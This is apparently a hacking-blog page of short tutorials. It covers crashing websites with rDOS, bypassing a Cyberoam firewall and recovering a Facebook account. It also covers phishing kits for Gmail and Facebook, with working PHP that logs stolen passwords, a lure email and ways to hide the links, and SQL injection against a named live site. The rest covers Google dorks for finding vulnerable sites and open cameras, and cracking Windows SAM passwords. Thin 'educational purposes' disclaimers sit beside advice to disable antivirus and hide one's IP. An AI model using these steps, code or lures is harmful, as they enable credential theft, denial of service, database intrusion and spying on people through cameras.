How to crash small websites using RDOS | DOS tutorial

TOOLS REQUIRED:

• Port Scanner(ZenMap)
• rDOS(Google IT)
• Ip Hiding tool(Ultrasurf)

NOTE: Use At your own RISK

You can Google the Tools above and download it and when you Download rDOS your antivirus may or may not detect the rDOS as a thread so if it Detects and delete it then try TURNING-OFF your Antivirus & Download it and then your IP Hiding Tool not to Trace you..

STEP 1

First of all you need to know the IP address of the website you want to crash.
Use ping command in windows to get the ip address of the website.
open CMD and enter ping www.website.com

Now you have the IP address of the website.

STEP 2

Now use Port scanner to check whether PORT 80 is open or not. If PORT 80 is not open choose another website to hack
otherwise you can crash this website.

STEP 3

 Now open your  rDos. Enter your victims ip that you got from step 1.
It will ask you for the port to attack use port 80 that’s why we scanned to make sure that 80 was open! If it is closed it will not work.

Read More...

How to Regain Access to your Hacked Facebook Account Easily

Step 1

Visit http://www.facebook.com/hacked.

Step 2

Click My Account Is Compromised as shown in below screenshot

Step 3

Now enter your Email,Phone Or Username and Click on Search

And now identify your account & now click on continue without entering the password and then you will be redirected to another page as show in Step 4.

Step 4

Now choose your option to reset your password....

Read More...

How to Bypass CYBEROAM

TECHNIQUES TO BYPASS OR HACK CYBEROAM

USE TOR

• Download TOR Browser
• Install or Extract TOR browser in a portable USB drive.
• Plug your USB drive in computer and start TOR browser and start surfing on Internet, Now all websites like FACEBOOK, ORKUT, BLOGGER are accessible.

CACHED HACK

This HACK work for all blocked websites. You can easily open blocked websites using this technique. When you search anything using google In the each search result there are two things in blue color prior to URL i.e Cached and Similar. To view that blocked Website You have to click on Cached Click on CACHED to access blocked websites.

PING HACK

There are millions of Proxy websites available on Internet. Find non popular proxy websites to open blocked websites. Then follow these steps

• Start Command Prompt.
• Type Ping www.proxywebsite.com
• Copy IP address of that proxy website and paste into on you browser.
• Your blocked website will be unblocked.

Note : Try to find non popular proxy website, there are lots of proxy websites available on Internet and not be able to cyberoam block all proxy websites from Internet so this hack will surely work if you find non popular proxy website which make fool to cyberoam.

HTTPS HACK

Try to find proxy website that uses https i.e. SSL proxies are also not blocked by any Cyberoam.

Read More...

Gmail Phishing

This tutorial is only for Educational purpose don’t misuse it  we will Not Hold any responsibility.

Step 1:- At this step we need to Phishing page, Download the gmail phishing page From Here.


After Download Extract the Phishing package, in this package you will get three files.

1. Gmail.html [Phishing Page for Gmail ]
2. Mail.php [ This file will redirect you phishing page and password ]
3. log.txt [ This text file is used to store the password]

Step 2:- Now you’ll have to upload all above files on webhosting, So for this you can create a free account on any free web-hosting site.   Here is some free web-hosting site.

www.yourfreehosting.net
www.esmartstart.com
www.110mb.com
www.t35.com
www.drivehq.com

In this tutorial i am using www.t35.com, So how i did it, check it.

• First of all create a free account on www.t35.com and then login into your account after login click on new directory and give the directory name and click on tick mark, This directory was created on the root folder.

• Now click on the new created directory and than click to upload button and upload all files which you download in the first step.

Step 3:- Now open the gmail.html page by clicking on the open link. 

Step 4:- Copy the web address from the address bar(the address of your gmail is very lengthy so to make shorten we used dot.tk) and than open www.dot.tk and rename the long web address into short address.

Step 5:- In this Step we create a new gmail account, after created the gmail account go to Settings<Accounts and Import<Send mail as< and click on edit info. On the popup box enter the name of gmail account which is shown when we send the email to another. For exam we give the name like gmail support, gmail mail support, gmail admin etc

Step 6:- In this step we send the phishing page to the victim account. enter the message which you want to send the victim account. here I will give you one example.

Subject:  Notice: Please Verify your Gmail Account
Message: We have seen illegal activity from your account. please verify your account within three days other we have to lock your email account.
For verifying visit here www.abc.com [ give your link here ]

Step 7:- When the victim read the message and click on the Phishing page and enter the username password. The username and password will be stored on the log.txt file. We can see any time stored password on log.txt by open the log.txt file on your hosting area.

Read More...

How to make a Facebook Phishing Site Tutorial.

The way s the easiest and most commonly use way of hacking a Facbook account.

Step1: Goto www.facebook.com/login.php
Step2 : Save the file to your desktop with photos with name login.php
Step3 : Open the html file with notepad.
Step4 : Now search for form method="POST" and replace it with form method="GET"
Step5 : And next is replacing action="https://login.facebook.com/login.php?login_attempt=1" with action="lol.php"
Step6 : now open a notepad and type following as it is.

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("lol.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

NOW save this as hello.php

Step7 : now make a account on t35.com and Upload

Login.html
hello.php
lol.txt

For A DETAILED way of uploading the Phishing site Visit Click Here

NOTE: You ahve to make the other person enter his password and you can get the password by downloading the lol.txt file from your t35.com account by cPanel.

Read More...

Facebook Phishing Site Tutorial.

Step 1: The First Step in Making the site is to regester an account at http://www.000webhost.com/order.php (if you have account than you can skip first 2 steps)

Step 2: Now Goto your email account that you gave and confirm your account with confirmation link

Step 3: Now Download this FILE (http://www.mediafire.com/?klq1vak76bouzrw ) .

Step 4: Now Goto http://members.000webhost.com/ and Log into your account.

Step 5: Now when you are logged into your account click on the Go to Cpanel  in front of your domain that you had registered, and then Go to File Manager under Files and log into it.

. 

Step 6: Now Click on the Public_html.

Step 7: Now click on the Upload button, choose the file under the Archives that you have downloaded, to be uploaded.

 

 

Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected.

NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:
 
http://www.yoursitesadress.p4o.net/lol.html

If I am not clear in any point Please ask me in comments below.

THE DOWNLOAD LINK TO facebook.zip is http://adf.ly/73Q4s

PS:> If www.p4o.net didn't worked for you, you can use :

www.drivehq.com
www.yourfreehosting.net
www.esmartstart.com

The Input Data (Email and Password) will look like following:

UPDATE:
Now if you have successfully made the Phishing page(site) then you must know that on Facebook you cannot post it, mail it, or sent it in chat. e.g: www.yoursite.p4o.net. This is because Facebook dont allow the T35.com sites. So Solution to this problem is to use http://www.dot.tk for the URL hiding.
All you have to do is to Goto http://www.dot.tk , on the main page enter your Phishers address and get a domain for that. Like for www.myphisher.p4o.net you gets www.myphisher.tk. And facebook will allow you to post it

HOW TO FIND YOUR USERNAME?

Ok guys this is the most asked question of all so here is a simple answer, just look in the following picture of Admin Paned the red shaded area tells you the username of the website

Read More...

SQL INJECTION | Website Deface | Using tool | Live Example

What is SQL injection ?

SQL stands for Structured Query Language.SQL is used to design the databses. The information is stored in databses. SQL injection is the vulnerability occuring in database layer of application which allow attacker to see the contents stored in database. This vulnerabilty occures when the user's input is not filtered or improperly filtered.

The main goal of attacker is use to access the information stored in website's database. It can be done manually. In this tutorial, I am using to do the same thing easily using a tool.


I remind you again that its only for educational purposes.


Requirement: Download the tool from here.  Its SqliHelperV.2.1.


Steps of attack :-

Vulnerable Website > Database > Tables > Columns > Data

 Search for any vulnerable website using Google Dorks. I found this website
http://www.shelter.org/org/news.php?id=5. 
I came to know its vulnerable because when I attached a single quote at the end, it didn't filter it and returned me with an error.


http://www.shelter.org/org/news.php?id=5'


Step 1.  Run the tool and there is no need of any installation. Input the vulnerable URL and click on 'Inject'

 

Step 2 : After processing is done. Click on "Get Database".It would then show the databases

Step 3:  Select any database other than "Information_schema" and Click on "Get tables". It would start fetching all tables. Have some patience. In most of the cases there is a table like admin or login or users etc.

 

Step 4: Select any Table and click on "Get Columns".

Step 5: Select the column and click on "Dump Now" . A new pop up window would open showing you the data stored in it.

Try the same thing manually to practice your skills

So You came to know that how deadly it could be to allow users to send their input without any filteration/validation. So never be lazy at programming and use possible filteration mechanisms.

Read More...

Google Dorks | Using Google efficiently

Do you know how to use google ? Sounds a silly question because even children can easily use google search engine.But the thing is that how efficiently we can make use of google. Google dorks are nothing but simple search operators that are used to refine our search. okay lets suppose that you wanna search for ebooks on topic 'networking' , our obvious search queries would be like this "Networking ebooks", "free ebooks for networking" etc,we keep going into the websites, clicking on link after links and then get proper downling links. Now lets do the same search in a different way , type on google "ext:pdf networking" (without quotes)

and see what you get in results,google returned direct downloading links of ebooks on networking that is files with extension pdf.
I hope you have got an idea of google dorks or google search operators.

List of basic search oprators,their description and examples.

1. site - It returns the websites of specified domains .

Example- site:explorehacking.com will return the links of webpages of  domain explorehacking.com. site:explorehacking.com phishing will return all the webpages of domain explorehacking.com which contain word 'phishing'.
Suppose you want google to return only government websites,
you can use site:gov or say pakistani websites use site:pk

2.intitle and allintitle - It restricts the results to pages whose title contain specified word/phrase.

 examples-
intitle:admin will return only those pages whose title contains word 'admin'.
intitle:admin login will return only those pages whose title contains word 'admin' and word 'login' can be in anywhere in page.

allintitle:admin login will return those pages whose title contains both words admin and login. This is simply equivalent to intitle:admin intitle:login

3.inurl- as clear from name, it restricts the results to sites whose URL's contains specified phrase.

examples-
inurl:adminlogin will return only those pages whose URL contains  'adminlogin'.
 Like allintitle, you can similarly use allinurl. I dont feel there is need to explain allinurl.

4. related- It returns the websites similar to specified websites.

examples :-
related:www.mobivox.com , now mobivox.com provides free/cheap calls facility. This search query would return results containing websites which provide such kind of services.

related:www.hidemyass.com , now hidemyass.com provides services to maintain anonymity using proxies.This search query would return results containing websites which provide services related to proxies.

5. cache: It returns the cached webpage that is kept with google.

example:-
cache:www.explorehacking.com, this dork is useful very when actually the website is down and
you can still view its contents (from cached pages).

 6. ext- It specifies the extension .

You can use 'filteype' at place of 'ext'.
example-:
ext:ppt hacking - this will return  powerpoint presentations (ppt files) on topic 'hacking'.

ext:doc hacking - this will return microsoft word files on topic 'hacking'

 Extensions that google supports are pdf,swf,rtf,doc,ppt,dwf,ps,kml,kmz,xls.


Note: Undoubtedly,you can combine these search operators for example
site:gov inurl:adminlogin will return the government site webpages who have word 'adminlogin' in URL.

Accessing Unprotected Cameras using google ?
So the heading sounds interesting. We can access the live cameras using google dorks.
Remember, cameras are also present at beaches ;)
Just type this in google search box and hit enter.
inurl:view/index.shtml .

Many of these wont ask for password, view might be dark (coz it would be night there) and you need good internet speed . Have fun.

Download a long list of such dorks to view unprotected cameras and the software from here.

Note:These google dorks when used smartly are really useful from hacker's point of view to search for vulnerable websites. I will try to write a post regarding same.

Read More...

Windows Logon Password - How crackers work ?

Cracking windows logon password is not so difficult. You can get many offline password crackers  which could change/clear the existing password (like offline nt password and registry editor) or cracks the existing password (like oph crack). Just download their ISO images ,burn them,insert to CD ROM and then things are simply self explainatory. I am writing this post to make you clear that how actually these password crackers work. 

Okay when you set windows logon password, it is obviously stored in a file somewhere in windows.

The password is stored in SAM file placed in %systemroot%\system32\config  (like C:\windows\system32\config).

Now why we just dont try to open SAM and see all stored passwords. Okay lets do it, go to C:\windows\system32\config and open SAM. You must get an error that " it is in use by some another application". Actually we cant open SAM file when windows is running . Even if anyhow we manage to access the content of SAM file, we won't get the passwords in clear text but they are encrypted.

So , what is SAM file ?

SAM stands for Security Accounts Manager. SAM is database stored as registry in windows that stores windows users passwords in hashed formats( LM and NTLM). These are usually called as hashes.

What are hashes ?

Hashes are kind of encryption.  A hash function is a one way function. One way means, if plain text

is converted into hash, it can not be converted back plain text. Remember this is the most important

point that they are one way functions.

What is windows authentication procedure ?

When ever a user creates new account in windows, its password is convetred to hash and stored in SAM database.When user logins, the password is converted to hash and is compared with the stored hash in SAM database, if both the hashes match , the user is authenticated.

How to access SAM file ?

SAM file can not be moved/copied or opened when windows is running. It can be accessed only when windows is offline/not running . Got confused that how can we use the windows files when it is not running ?

Here comes the concept of Live Operating systems. A live CD is containing a bootable OS. Just insert it in CD ROM and you can use it without any installation.

How to crack Windows password ?

Okay suppose we have got access to SAM file and have password hashes. Dont you think its useless because hashes cant be coverted to plain text ? Lets see, what we can do.

We ( I mean automated tools) can actually do two things.

1. Clear/Change password :Clear the existing hash and put new hash (we know alogrithm to convert plain text to hash) in order to change/clear the password. This is  how offline nt password and registry editor work. It doesn't give you the orignal password but helps you to change/clear it.

2.Crack password Make a long list of all possible combinations of alphabets,numbers and convert them to hashes.Compare every hash with hash we obtained from SAM file and hashes could be cracked. This is exactly how OPH crack works. It has already saved hashes of many possible combinations of letters/numbers stored in tables called as rainbow tables.

I hope things are clear to you :).

Read More...